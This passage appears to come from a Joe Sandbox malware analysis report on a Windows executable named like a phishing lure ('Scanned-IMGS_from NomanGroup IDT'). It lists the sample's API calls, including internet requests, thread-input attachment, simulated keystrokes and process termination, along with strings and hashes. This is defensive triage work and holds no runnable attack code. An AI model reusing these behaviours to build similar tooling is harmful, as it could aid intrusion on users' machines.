                                                                                • IIDFromString.OLE32(?,?), ref: 004D384C
                                                                                • VariantInit.OLEAUT32(?), ref: 004D38E4
                                                                                • VariantClear.OLEAUT32(?), ref: 004D3936
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                                • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                • API String ID: 636576611-1287834457
                                                                                • Opcode ID: 6afe52b2c6764301adf9ee18adb46a961ef2ab8b60ae9f88706c17b2e3a91674
                                                                                • Instruction ID: 78a0f26b65dc052c867300673cfce3a26d24613021de7af13f9eef2674901e4f
                                                                                • Opcode Fuzzy Hash: 6afe52b2c6764301adf9ee18adb46a961ef2ab8b60ae9f88706c17b2e3a91674
                                                                                • Instruction Fuzzy Hash: B5618970608701AFD310EF55C898B5ABBE4AF48716F00481FF9859B391D778EA49CB9B
                                                                                APIs
                                                                                • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 004C33CF
                                                                                  • Part of subcall function 00459CB3: _wcslen.LIBCMT ref: 00459CBD
                                                                                • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 004C33F0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: LoadString$_wcslen
                                                                                • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                                • API String ID: 4099089115-3080491070
                                                                                • Opcode ID: 5cd004e25bd8d38512fb84f8ad9aadbc6db3d2c2ffb2664ceef75270772ac583
                                                                                • Instruction ID: da5dd52861bebc9033552998af3c753e14a21bc9e5c27d442b8f76249ac9b616
                                                                                • Opcode Fuzzy Hash: 5cd004e25bd8d38512fb84f8ad9aadbc6db3d2c2ffb2664ceef75270772ac583
                                                                                • Instruction Fuzzy Hash: EA51D372800209BADF14EBE1CD42EEEB779AF14346F10446AF90572052EB392F5DDB68
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: _wcslen$BuffCharUpper
                                                                                • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                                • API String ID: 1256254125-769500911
                                                                                • Opcode ID: 8533c14669e16cdb476b10779a0f6845e06e7ef57138892006e7ccccf4316b78
                                                                                • Instruction ID: 5eed5fbd3715cc51d3c5537d5ddb9e520512a7c44ae2875e6b1b0d2383ddd00c
                                                                                • Opcode Fuzzy Hash: 8533c14669e16cdb476b10779a0f6845e06e7ef57138892006e7ccccf4316b78
                                                                                • Instruction Fuzzy Hash: 8741D432A001269BCB206F7D88905FF77A5EBA0758B24412BE465DB384E779CD82C7E5
                                                                                APIs
                                                                                • SetErrorMode.KERNEL32(00000001), ref: 004C53A0
                                                                                • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 004C5416
                                                                                • GetLastError.KERNEL32 ref: 004C5420
                                                                                • SetErrorMode.KERNEL32(00000000,READY), ref: 004C54A7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Error$Mode$DiskFreeLastSpace
                                                                                • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                • API String ID: 4194297153-14809454
                                                                                • Opcode ID: ec5aacf21a0f6074baddf930c5e1b58134d4d45143cfe13ee8edcc18a0b39552
                                                                                • Instruction ID: d3313de4d882794a934676aff02a704e5b68cddba1cb66e462acca064cdfb9b0
                                                                                • Opcode Fuzzy Hash: ec5aacf21a0f6074baddf930c5e1b58134d4d45143cfe13ee8edcc18a0b39552
                                                                                • Instruction Fuzzy Hash: 90318039A005049FD754DF68D884FAE7BA4EB45309F14806AE805CB352DB38EDC6CB99
                                                                                APIs
                                                                                • CreateMenu.USER32 ref: 004E3C79
                                                                                • SetMenu.USER32(?,00000000), ref: 004E3C88
                                                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004E3D10
                                                                                • IsMenu.USER32(?), ref: 004E3D24
                                                                                • CreatePopupMenu.USER32 ref: 004E3D2E
                                                                                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004E3D5B
                                                                                • DrawMenuBar.USER32 ref: 004E3D63
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                • String ID: 0$F
                                                                                • API String ID: 161812096-3044882817
                                                                                • Opcode ID: ecd71fb760f4a10c5b86fec1030933cdebee2a534fbd8536302ec6025468258b
                                                                                • Instruction ID: 20aee4a145cbf209e24ae901734a79bdc4355f6d2e690ff5ca769fc9602f9cb4
                                                                                • Opcode Fuzzy Hash: ecd71fb760f4a10c5b86fec1030933cdebee2a534fbd8536302ec6025468258b
                                                                                • Instruction Fuzzy Hash: 6741AD75A01249EFDB10CF61D888EAA77B5FF49342F140029F9069B360D734AA11CF98
                                                                                APIs
                                                                                • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004E3A9D
                                                                                • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004E3AA0
                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 004E3AC7
                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004E3AEA
                                                                                • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 004E3B62
                                                                                • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 004E3BAC
                                                                                • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004E3BC7
                                                                                • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 004E3BE2
                                                                                • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 004E3BF6
                                                                                • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 004E3C13
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$LongWindow
                                                                                • String ID:
                                                                                • API String ID: 312131281-0
                                                                                • Opcode ID: c8f0240a3fed95b6214013b01bf928c0d33df1569287d60023ac1a8a74f904fa
                                                                                • Instruction ID: 11d65f599f0070db43d8a36c9bc8ac48f773c896673879c5d9af80157bf81a20
                                                                                • Opcode Fuzzy Hash: c8f0240a3fed95b6214013b01bf928c0d33df1569287d60023ac1a8a74f904fa
                                                                                • Instruction Fuzzy Hash: 0B618D71900248AFDB11DF68CC85EEE77B8EF09305F10019AFA05AB392C774AE46DB54
                                                                                APIs
                                                                                • GetCurrentThreadId.KERNEL32 ref: 004BB151
                                                                                • GetForegroundWindow.USER32(00000000,?,?,?,?,?,004BA1E1,?,00000001), ref: 004BB165
                                                                                • GetWindowThreadProcessId.USER32(00000000), ref: 004BB16C
                                                                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,004BA1E1,?,00000001), ref: 004BB17B
                                                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 004BB18D
                                                                                • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,004BA1E1,?,00000001), ref: 004BB1A6
                                                                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,004BA1E1,?,00000001), ref: 004BB1B8
                                                                                • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,004BA1E1,?,00000001), ref: 004BB1FD
                                                                                • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,004BA1E1,?,00000001), ref: 004BB212
                                                                                • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,004BA1E1,?,00000001), ref: 004BB21D
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                • String ID:
                                                                                • API String ID: 2156557900-0
                                                                                • Opcode ID: d770ed7df9c1265267c2ae7428cd225712bded05ab04afa40386d071c3750b3e
                                                                                • Instruction ID: d5505259c8310b6d95bc044be0f55c77be62519a011758c993679cd61fd77091
                                                                                • Opcode Fuzzy Hash: d770ed7df9c1265267c2ae7428cd225712bded05ab04afa40386d071c3750b3e
                                                                                • Instruction Fuzzy Hash: BB31A071640204AFDB249F64DC8CFAE7BA9FF61351F104056F910DA290E7B89D068FB8
                                                                                APIs
                                                                                • _free.LIBCMT ref: 00482C94
                                                                                  • Part of subcall function 004829C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0048D7D1,00000000,00000000,00000000,00000000,?,0048D7F8,00000000,00000007,00000000,?,0048DBF5,00000000), ref: 004829DE
                                                                                  • Part of subcall function 004829C8: GetLastError.KERNEL32(00000000,?,0048D7D1,00000000,00000000,00000000,00000000,?,0048D7F8,00000000,00000007,00000000,?,0048DBF5,00000000,00000000), ref: 004829F0
                                                                                • _free.LIBCMT ref: 00482CA0
                                                                                • _free.LIBCMT ref: 00482CAB
                                                                                • _free.LIBCMT ref: 00482CB6
                                                                                • _free.LIBCMT ref: 00482CC1
                                                                                • _free.LIBCMT ref: 00482CCC
                                                                                • _free.LIBCMT ref: 00482CD7
                                                                                • _free.LIBCMT ref: 00482CE2
                                                                                • _free.LIBCMT ref: 00482CED
                                                                                • _free.LIBCMT ref: 00482CFB
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                • String ID:
                                                                                • API String ID: 776569668-0
                                                                                • Opcode ID: 66ce8ad1b57d23071cbdecb7d9476694c392d66be57e0b05894dbb46a276f898
                                                                                • Instruction ID: c1d5600d044cb9b7954ab3af04c9fe372c264ba17defc1d1302a5a5c4556f512
                                                                                • Opcode Fuzzy Hash: 66ce8ad1b57d23071cbdecb7d9476694c392d66be57e0b05894dbb46a276f898
                                                                                • Instruction Fuzzy Hash: 5011AAB5200108AFCB02FF55DA42CDD3BA5FF05354F42489AFA485F222D679EE509B54
                                                                                APIs
                                                                                • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00451459
                                                                                • OleUninitialize.OLE32(?,00000000), ref: 004514F8
                                                                                • UnregisterHotKey.USER32(?), ref: 004516DD
                                                                                • DestroyWindow.USER32(?), ref: 004924B9
                                                                                • FreeLibrary.KERNEL32(?), ref: 0049251E
                                                                                • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0049254B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
Similarity
• API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
• String ID: close all
• API String ID: 469580280-3243417748
APIs
• SetWindowLongW.USER32(?,000000EB), ref: 00455C7A
  • Part of subcall function 00455D0A: GetClientRect.USER32(?,?), ref: 00455D30
  • Part of subcall function 00455D0A: GetWindowRect.USER32(?,?), ref: 00455D71
  • Part of subcall function 00455D0A: ScreenToClient.USER32(?,?), ref: 00455D99
• GetDC.USER32 ref: 004946F5
• SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00494708
• SelectObject.GDI32(00000000,00000000), ref: 00494716
• SelectObject.GDI32(00000000,00000000), ref: 0049472B
• ReleaseDC.USER32(?,00000000), ref: 00494733
• MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 004947C4
Similarity
• API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
• String ID: U
• API String ID: 4009187628-3372436214
APIs
• LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 004C35E4
  • Part of subcall function 00459CB3: _wcslen.LIBCMT ref: 00459CBD
• LoadStringW.USER32(00522390,?,00000FFF,?), ref: 004C360A
Similarity
• API ID: LoadString$_wcslen
• String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
• API String ID: 4099089115-2391861430
APIs
• InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 004CC272
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004CC29A
• HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 004CC2CA
• GetLastError.KERNEL32 ref: 004CC322
• SetEvent.KERNEL32(?), ref: 004CC336
• InternetCloseHandle.WININET(00000000), ref: 004CC341
Similarity
• API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
• String ID:
• API String ID: 3113390036-3916222277
APIs
• GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00493AAF,?,?,Bad directive syntax error,004ECC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 004B98BC
• LoadStringW.USER32(00000000,?,00493AAF,?), ref: 004B98C3
  • Part of subcall function 00459CB3: _wcslen.LIBCMT ref: 00459CBD
• MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 004B9987
Similarity
• API ID: HandleLoadMessageModuleString_wcslen
• String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
• API String ID: 858772685-4153970271
APIs
• GetParent.USER32 ref: 004B20AB
• GetClassNameW.USER32(00000000,?,00000100), ref: 004B20C0
• SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 004B214D
Similarity
• API ID: ClassMessageNameParentSend
• String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
• API String ID: 1290815626-3381328864
APIs
Similarity
• API ID: _free$EnvironmentVariable___from_strstr_to_strchr
• String ID:
• API String ID: 1282221369-0
APIs
• SendMessageW.USER32(?,00002001,00000000,00000000), ref: 004E5186
• ShowWindow.USER32(?,00000000), ref: 004E51C7
• ShowWindow.USER32(?,00000005,?,00000000), ref: 004E51CD
• SetFocus.USER32(?,?,00000005,?,00000000), ref: 004E51D1
  • Part of subcall function 004E6FBA: DeleteObject.GDI32(00000000), ref: 004E6FE6
• GetWindowLongW.USER32(?,000000F0), ref: 004E520D
• SetWindowLongW.USER32(?,000000F0,00000000), ref: 004E521A
• InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 004E524D
• SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 004E5287
• SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 004E5296
Similarity
• API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
• String ID:
• API String ID: 3210457359-0
APIs
• LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 004A6890
• ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 004A68A9
• LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 004A68B9
• ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 004A68D1
• SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 004A68F2
• DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00468874,00000000,00000000,00000000,000000FF,00000000), ref: 004A6901
• SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 004A691E
• DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00468874,00000000,00000000,00000000,000000FF,00000000), ref: 004A692D
Similarity
• API ID: Icon$DestroyExtractImageLoadMessageSend
• String ID:
• API String ID: 1268354404-0
APIs
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 004CC182
• GetLastError.KERNEL32 ref: 004CC195
• SetEvent.KERNEL32(?), ref: 004CC1A9
  • Part of subcall function 004CC253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 004CC272
  • Part of subcall function 004CC253: GetLastError.KERNEL32 ref: 004CC322
  • Part of subcall function 004CC253: SetEvent.KERNEL32(?), ref: 004CC336
  • Part of subcall function 004CC253: InternetCloseHandle.WININET(00000000), ref: 004CC341
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                                • String ID:
                                                                                • API String ID: 337547030-0
                                                                                • Opcode ID: 4f690bfb2fe212ac54ab55904ffdf41fc1f310656f36786a88a9c5422c6b7a45
                                                                                • Instruction ID: 13e962c0f296bd629c2a9430b9d5512118ea8fb5b38a9c5d93b1ca525e77be20
                                                                                • Opcode Fuzzy Hash: 4f690bfb2fe212ac54ab55904ffdf41fc1f310656f36786a88a9c5422c6b7a45
                                                                                • Instruction Fuzzy Hash: 3831BE79900641AFDB608FA5DCC4F77BBE9FF18300B04446EF95A86611CB34E8119FA9
                                                                                APIs
                                                                                  • Part of subcall function 004B3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 004B3A57
                                                                                  • Part of subcall function 004B3A3D: GetCurrentThreadId.KERNEL32 ref: 004B3A5E
                                                                                  • Part of subcall function 004B3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,004B25B3), ref: 004B3A65
                                                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 004B25BD
                                                                                • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 004B25DB
                                                                                • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 004B25DF
                                                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 004B25E9
                                                                                • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 004B2601
                                                                                • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 004B2605
                                                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 004B260F
                                                                                • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 004B2623
                                                                                • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 004B2627
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                • String ID:
                                                                                • API String ID: 2014098862-0
                                                                                • Opcode ID: 18537b439d5485f43ad071151dead102a774424c4bb22639b175e85db70f3278
                                                                                • Instruction ID: a6b3653b2059019c7d702400c011611ebfa4d413fd178b27b89c76585eee77eb
                                                                                • Opcode Fuzzy Hash: 18537b439d5485f43ad071151dead102a774424c4bb22639b175e85db70f3278
                                                                                • Instruction Fuzzy Hash: 4901D830390250BBFB1067699CCAF997F59DF4EB12F100016F314AE0D2C9E114458A7D
                                                                                APIs
                                                                                • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,004B1449,?,?,00000000), ref: 004B180C
                                                                                • HeapAlloc.KERNEL32(00000000,?,004B1449,?,?,00000000), ref: 004B1813
                                                                                • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,004B1449,?,?,00000000), ref: 004B1828
                                                                                • GetCurrentProcess.KERNEL32(?,00000000,?,004B1449,?,?,00000000), ref: 004B1830
                                                                                • DuplicateHandle.KERNEL32(00000000,?,004B1449,?,?,00000000), ref: 004B1833
                                                                                • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,004B1449,?,?,00000000), ref: 004B1843
                                                                                • GetCurrentProcess.KERNEL32(004B1449,00000000,?,004B1449,?,?,00000000), ref: 004B184B
                                                                                • DuplicateHandle.KERNEL32(00000000,?,004B1449,?,?,00000000), ref: 004B184E
                                                                                • CreateThread.KERNEL32(00000000,00000000,004B1874,00000000,00000000,00000000), ref: 004B1868
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                • String ID:
                                                                                • API String ID: 1957940570-0
                                                                                • Opcode ID: a8e68a4557aced61625c0130b92c8030cc62b012bb9bd92b65168922c77cbc03
                                                                                • Instruction ID: 4ae32e3f3fa548072103d8e53cb22d80d9bc8ab28d421240de61054b40d54715
                                                                                • Opcode Fuzzy Hash: a8e68a4557aced61625c0130b92c8030cc62b012bb9bd92b65168922c77cbc03
                                                                                • Instruction Fuzzy Hash: 8E01A8B5240348BFE710ABA5DCC9F6B7BACEB89B11F404421FA05DB1A2CA749C018F24
                                                                                APIs
                                                                                  • Part of subcall function 004BD4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 004BD501
                                                                                  • Part of subcall function 004BD4DC: Process32FirstW.KERNEL32(00000000,?), ref: 004BD50F
                                                                                  • Part of subcall function 004BD4DC: CloseHandle.KERNEL32(00000000), ref: 004BD5DC
                                                                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 004DA16D
                                                                                • GetLastError.KERNEL32 ref: 004DA180
                                                                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 004DA1B3
                                                                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 004DA268
